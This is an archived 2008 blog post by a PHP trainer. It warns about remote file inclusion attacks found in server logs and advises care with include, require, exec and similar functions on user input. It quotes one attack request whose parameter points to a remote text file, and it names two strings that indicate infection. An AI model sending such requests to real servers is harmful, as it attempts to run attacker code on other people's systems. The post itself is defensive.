|
| Home | Accessibility | Courses | Diary | The Mouth | Forum | Resources | Site Map | About Us | Contact |
|
Injection Attacks - avoiding them in your PHP
"Please help me debug this virus." I'm paraphrasing something that was posted, a long while ago now, on a board I look after ... and I deleted the code pretty darned fast, as I didn't (and still don't) want to form a source of information for the less scrupulous. I was looking at a few issues on one of our servers earlier today, and found myself looking through page after page of attempted injection attacks, where a rogue visitor to the web site (almost inevitable an automated program) supplies a parameter that's the URL from another site, in the hope that my PHP script will read that other page and run the code therein on my server ... here's an example of the sort of thing (and this one's quite well known, and I have obfuscated it anyway, so I am giving few secrets away) /phphtml.php?htmlclass_path=http://titureddo.changeview.org/vacanze/vini.txt? Now ... this issue turned out to be a side shoot of what I was hunting down, but it acts as a timely reminder to be very careful indeed about using PHP's require, include, passthru, exec, system (and that may not be an exhaustive list either) on anything that could remotely be a variable derived from a user input via $_REQUEST and friends. What's the risk? It's an injection attack (yes, I have the code. No - I am not reproducing it here!) and if it succeeds in finding a hole in your system, chances are (and experiences I have heard of confirm) that it will install itself on your server which will then form a part of the breeding colony ... How many hack attempts like this are we getting? I estimate it's now thousands per day. How do I know if I'm infected Well ... if you search your web pages for kangkung or RoxTeam and find something that you didn't know was there ... Please note that this is just an example of one form of injection attack - this article is not intended to provide a complete of definitive list in any shape or form! (written 2008-08-31 23:54:42) Associated topics are indexed under H117 - Security in PHP
Some other Articles
Think before you sendCalling procs in Tcl and how it compares to Perl Reception Server overloading - turns out to be feof in PHP Injection Attacks - avoiding them in your PHP Pointing all the web pages in a directory at a database The Rise and Rise of First Bus Fares Does fruit and veg drag on? Easterholic What is my real and my effective ID? [Linux] |
1891 posts, page by page
Link to page ... 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38 at 50 posts per pageThis is a page archived from The Horse's Mouth at http://www.wellho.net/horse/ - the diary and writings of Graham Ellis. Every attempt was made to provide current information at the time the page was written, but things do move forward in our business - new software releases, price changes, new techniques. Please check back via our main site for current courses, prices, versions, etc - any mention of a price in "The Horse's Mouth" cannot be taken as an offer to supply at that price.
Link to Ezine home page (for reading).
Link to Blogging home page (to add comments).
PH: 0800 043 8225 or 01225 708225 • FAX: 0845 8382 405 or 01225 707126 • EMAIL: info@wellho.net • WEB: http://www.wellho.net • SKYPE: wellho